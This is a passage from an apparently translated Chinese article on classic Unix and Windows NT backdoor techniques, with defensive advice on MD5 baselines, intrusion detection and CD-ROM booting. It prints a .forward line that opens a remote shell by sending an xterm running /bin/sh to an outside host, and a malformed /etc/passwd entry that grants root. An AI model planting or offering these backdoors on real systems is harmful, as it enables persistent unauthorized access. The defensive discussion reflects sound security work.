CMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允 许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间 形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.
加密连接
管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加 密后,就不可能被判定两台机器间的传输内容了.
Windows NT
由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说 就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广 泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地 利用WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows N T 上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程 序 . 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Net work Traffic backdoors, theyarevery feasible for intruders to inst all on Windows NT. 此处该如何翻译?
:( 解决 当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀 .
评估
首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之 .许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的 安 全补丁的话,许多公司将大大提高安全性.
MD5基准线
一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入 侵前由干净 系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也 被合并进去了 .一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多 包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因 为他们恢复系 统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.
入侵检测
随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要. 以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于 实 时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判 断是 否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号? 取数据进 行进一 步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或 者是否 装载加密shell会话.
从CD-ROM启动
一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.
警告 由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击 和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不 懈的努力! ( Be aware that no defense is foolproof, and that there is no substitu te for diligent attention. 此句该如何翻译? :( )
you may want to add:
forward Backdoor
On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username
a .forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
permutations of this method include alteration of the systems mail ali ases file (most commonly located at /etc/aliases). Note that this is a simple permutation, the more advanced can run a simple script from the forward file that can take arbitrary commands via stdin (after minor
preprocessing).
PS: The above method is also useful gaining access a companies mailhub (assuming there is a shared a home directory FS on the client and ser ver).
$#@62; Using smrsh can effectively negate this backdoor (although its quite
$#@62; possibly still a problem if you allow things like elms filter or
$#@62; procmail which can run programs themselves...).
你也许要增加:
.forward后门
Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户usernam e 的 .forward可能设置如下:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e /bin/sh"
这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后). $#@62;利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elms filter或 procmail$#@62;类程序, 很有可能还有问题
......)
( 此段的内容理解不深, 故付上英文, 请指教! )
你也许能用这个"特性"做后门:
当在/etc/password里指定一个错误的uid/gid后, 大多数login(1)的实现是不能 检查出这个错误 的uid/gid, 而atoi(3)将设uid/gid为0, 便给了超级用户的权 利.
例子:
rmartin:x:x50:50:R. Martin:/home/rmartin:/bin/tcsh 在Linux里,这将把用户 rmartin的uid设为0.
|